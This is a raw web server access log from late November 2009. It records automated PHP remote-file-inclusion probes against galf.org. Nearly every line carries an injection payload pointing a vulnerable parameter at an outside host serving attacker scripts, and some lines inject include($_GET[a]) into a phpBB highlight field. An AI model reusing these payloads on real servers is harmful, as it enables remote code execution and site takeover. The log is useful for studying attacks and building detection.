213.186.34.130 - - [29/Nov/2009:22:59:51 -0800] "GET /logs//main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:13 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:13 -0800] "GET /logs/access_090914.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:13 -0800] "GET /logs/access_090706.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:13 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:26 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:26 -0800] "GET /logs/access_090706.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:26 -0800] "GET /logs/access_090914.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:26 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:30 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:30 -0800] "GET /logs/access_090914.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:30 -0800] "GET /logs/access_090706.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:00:31 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:23:05:27 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [29/Nov/2009:23:05:27 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [29/Nov/2009:23:05:27 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.22.119.110 - - [29/Nov/2009:23:06:36 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.22.119.110 - - [29/Nov/2009:23:06:36 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.22.119.110 - - [29/Nov/2009:23:06:37 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ranjessica.com/smf/Themes/.id2???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:07:00 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:07:00 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:07:00 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:07:06 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:07:06 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:07:06 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:23:07:25 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.38.66 - - [29/Nov/2009:23:08:41 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
89.234.38.66 - - [29/Nov/2009:23:08:59 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
89.234.38.66 - - [29/Nov/2009:23:08:59 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
89.234.38.66 - - [29/Nov/2009:23:09:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
84.22.133.229 - - [29/Nov/2009:23:09:31 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.22.133.229 - - [29/Nov/2009:23:09:31 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.22.133.229 - - [29/Nov/2009:23:09:34 -0800] "GET /logs/access_090525.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:10:10 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:10:10 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:10:10 -0800] "GET /logs/access_090928.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [29/Nov/2009:23:10:40 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [29/Nov/2009:23:10:40 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [29/Nov/2009:23:10:40 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
84.22.133.229 - - [29/Nov/2009:23:11:22 -0800] "GET /logs/access_090511.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:11:41 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:11:41 -0800] "GET /logs/access_090928.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:23:11:41 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:12:32 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:12:44 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:12:55 -0800] "GET /logs/access_090622.log/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:12:55 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:12:55 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:46 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:46 -0800] "GET /logs/access_091102.log/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:47 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:47 -0800] "GET /logs/access.log/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:47 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:47 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:52 -0800] "GET /logs/access_091102.log/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:52 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:52 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:53 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:53 -0800] "GET /logs/access.log/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:13:53 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:40 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:40 -0800] "GET /logs/access_091102.log%20%20/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:41 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:41 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:41 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:41 -0800] "GET /logs/access.log%20%20/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:42 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:42 -0800] "GET /logs/access_091102.log%20%20/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:43 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:43 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:43 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:14:43 -0800] "GET /logs/access.log%20%20/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [29/Nov/2009:23:15:32 -0800] "GET /logs/access_090907.log/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:17:01 -0800] "GET ////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:17:01 -0800] "GET /logs/access_090622.log/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:17:01 -0800] "GET /logs/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.38.66 - - [29/Nov/2009:23:19:12 -0800] "GET /logs/index1.php?go=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.38.66 - - [29/Nov/2009:23:19:12 -0800] "GET /index1.php?go=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.38.66 - - [29/Nov/2009:23:19:12 -0800] "GET /logs/access_090831.log/index1.php?go=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [29/Nov/2009:23:19:15 -0800] "GET /logs/access_090831.log/////_SERVER[DOCUMENT_ROOT]=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.38.66 - - [29/Nov/2009:23:20:21 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:23:20 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [29/Nov/2009:23:24:07 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:25:02 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:25:02 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:25:02 -0800] "GET /logs/access_090720.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:25:27 -0800] "GET /logs/access.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:29:57 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:29:57 -0800] "GET /logs/access_090824.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:29:57 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:29:57 -0800] "GET /logs/access_090629.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:33:20 -0800] "GET /logs/access_090810.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:33:20 -0800] "GET /logs/access_090629.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:34:06 -0800] "GET /logs/access_090727.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:34:07 -0800] "GET /logs/access_090921.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:35:15 -0800] "GET /logs/access_090525.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.198.28 - - [29/Nov/2009:23:35:15 -0800] "GET /logs/access_090907.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.cbnumed.or.kr//bbs/icon/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:35:48 -0800] "GET /logs//mcf.php?content=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:35:49 -0800] "GET /mcf.php?content=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:35:49 -0800] "GET /logs/access_090907.log//mcf.php?content=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [29/Nov/2009:23:35:50 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [29/Nov/2009:23:35:50 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [29/Nov/2009:23:35:50 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:36:03 -0800] "GET /logs/access_090706.log//mcf.php?content=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [29/Nov/2009:23:36:28 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [29/Nov/2009:23:36:28 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [29/Nov/2009:23:36:28 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.186.34.130 - - [29/Nov/2009:23:37:40 -0800] "GET /logs/access_090907.log//main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [29/Nov/2009:23:38:16 -0800] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [29/Nov/2009:23:38:16 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [29/Nov/2009:23:38:16 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [29/Nov/2009:23:41:41 -0800] "GET /logs/access_090622.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
